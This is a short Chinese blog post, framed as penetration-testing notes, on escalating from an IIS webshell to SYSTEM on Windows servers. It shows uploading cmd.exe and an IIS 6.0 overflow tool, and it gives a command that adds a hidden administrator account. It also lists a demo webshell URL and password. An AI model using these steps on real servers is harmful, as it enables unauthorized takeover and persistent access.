Windows系统溢出提权

Windows系统溢出提权

黑客资讯访客1970-01-01 8:00:003101A+A-

1、简介


window 服务器 常用的是win2003 win2008 win2012

在渗透测试中 ,我们获取的权限是iis_user用户组 ,要更高的权限就需要把当前的用

户提权到系统用户或超级管理员用户组。更高的权限方便我们在后续的渗透中,扩大

范围测试。

 

2、程序权限的对比

 

在iis里面 权限依次的大小对比

aspx->php=>asp

aspx默认能执行终端命令

php和asp 如果不能执行命令,在组件没有删除的情况下,可以上传cmd到可执行目录、执行命令 均可以执行终端命令。

执行命令的组件

wscript.shell √ 命令行执行组件,显示

 

3、 溢出过程


1在webshell中能执行终端命令


2上传溢出exp


3执行命令

 

4、实战


在iis里面默认上传的大小是200k 大于就会报错。

webshell
http://www.demoasp.com/sb.asp 密码F4ck


查看组件是否删除

 1559890706824445.jpg


查看目录是否可写 可写则上传cmd.exe 执行命令

1559890733119279.jpg

上传溢出工具 ii6.0溢出工具执行

1559890809241838.jpg

 

当前的权限就是system用户


增加用户命令

C:\RECYCLER\iis6.0.exe"net user moonsec moonsec /add & net localgroup administrators moonsec/add"

 

1559890901966493.png

 

登录服务器

1559890932509539.png

点击这里复制本文地址 以上内容由黑资讯整理呈现,请务必在转载分享时注明本文地址!如对内容有疑问,请联系我们,谢谢!
  • 1条评论
  • 性许路岷2022-06-03 04:42:04
  • 终端命令2上传溢出exp3执行命令 4、实战在iis里面默认上传的大小是200k 大于就会报错。webshellhttp://www.demoasp.com/sb.asp 密码F4ck查看组件是否删除

支持Ctrl+Enter提交

黑资讯 © All Rights Reserved.  
Copyright Copyright 2015-2020 黑资讯
滇ICP备19002590号-1
Powered by 黑客资讯 Themes by 如有不合适之处联系我们
网站地图| 发展历程| 留言建议| 网站管理